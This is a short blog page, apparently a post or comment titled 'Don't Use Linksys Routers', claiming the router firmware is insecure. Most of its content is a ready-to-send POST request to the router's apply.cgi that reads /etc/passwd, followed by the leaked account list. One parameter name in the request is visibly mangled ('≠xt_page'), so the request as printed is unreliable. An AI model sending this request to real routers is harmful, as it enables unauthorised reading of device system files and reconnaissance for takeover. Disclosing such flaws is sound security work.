Don’t Use Linksys Routers « Superevr

the firmware is so buggy/insecure, so getting passwd file is as easy as: POST /apply.cgi Host: 192.168.1.1 submit_button=Wireless_Basic&change_action=gozila_cgi≠xt_page=/etc/passwd ====> root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nologin sshd:x:22:22::/var/empty:/sbin/nologin admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga:x:1001:1001:Quagga:/var/empty:/bin/nologin firewall:x:1002:1002:Firewall:/var/empty:/bin/nologin

Comments are closed.

permalink